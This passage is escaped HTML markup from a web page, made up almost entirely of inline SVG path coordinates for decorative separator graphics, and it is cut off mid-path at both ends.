d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.